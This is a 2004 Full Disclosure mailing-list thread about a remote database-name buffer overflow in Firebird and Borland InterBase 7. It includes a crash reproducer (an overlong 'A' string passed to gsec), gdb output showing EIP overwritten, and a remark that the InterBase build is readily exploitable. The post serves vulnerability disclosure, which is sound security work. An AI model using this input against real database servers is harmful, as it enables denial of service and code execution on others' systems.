Full Disclosure mailing list archives

Re: Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow

From: Noam Rathaus <noamr () beyondsecurity com>
Date: Thu, 3 Jun 2004 13:36:33 +0300

On Thursday 03 June 2004 05:03, KF (lists) wrote:

Someone that has had some success communicating things security wise to
Borland may wish to contact them about this.

[root@CloneRiot bin]# rpm -ivh /root/InterBaseSS_LI-V7.1.0-1.i386.rpm

[kf@CloneRiot bin]$ pwd
/opt/interbase/bin
[kf@CloneRiot bin]$ ./gsec -database 127.0.0.1:`perl -e'print ("A"x300)'`

(gdb) c
Continuing.
[New Thread 1085279152 (LWP 21355)]
[New Thread 1095769008 (LWP 21356)]
[New Thread 1106258864 (LWP 21357)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1085279152 (LWP 21355)]
0x41414141 in ?? ()
(gdb) bt
#0  0x41414141 in ?? ()
#1  0x41414141 in ?? ()
#2  0x41414141 in ?? ()
...
#35 0x41414141 in ?? ()
#36 0x41414141 in ?? ()
(gdb)

(gdb) i r
eax            0x0      0
ecx            0x82025e4        136324580
edx            0x0      0
ebx            0x81fe29c        136307356
esp            0x40aff5f8       0x40aff5f8
ebp            0x41414141       0x41414141
esi            0x12c    300
edi            0x40affab8       1085274808
eip            0x41414141       0x41414141
eflags         0x10246  66118

(gdb) x/1s $esp
0x40aff5f8:      'A' <repeats 144 times>

[root@CloneRiot interbase]# ./bin/ibserver
Segmentation fault
-KF

Noam Rathaus wrote:

On Sunday 02 June 2002 01:52, KF (lists) wrote:

So is this firebird specific or does it also impact Borland Interbase
users?
-KF


We haven't tested Borland's Interbase as we didn't have any installation
available for testing. However I can assume that since this vulnerability
appears in version 1.0.2, which is of very close resemblance to Borland's
Interbase sources, that the vulnerability may also affect it.

Hi,

Well it appears that the Borland version is a bit more vulnerable, or in other 
words more exploitable, as in the Firebird I was unable to directly modify 
EIP, while it appears that the Borland version's EIP is easily modifyable.

Thank you for the assistance in verifying whether Borland's Interbase is also 
vulnerable.

-- 
Thanks
Noam Rathaus
CTO
Beyond Security Ltd.

Join the SecuriTeam community on Orkut:
http://www.orkut.com/Community.aspx?cmm=44441

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Firebird Database Remote Database Name Overflow Aviram Jenik (Jun 01)
- Re: Firebird Database Remote Database Name Overflow KF (lists) (Jun 01)
  - Re: Firebird Database Remote Database Name Overflow Noam Rathaus (Jun 02)
    - Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow KF (lists) (Jun 02)
    - Re: Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow Noam Rathaus (Jun 03)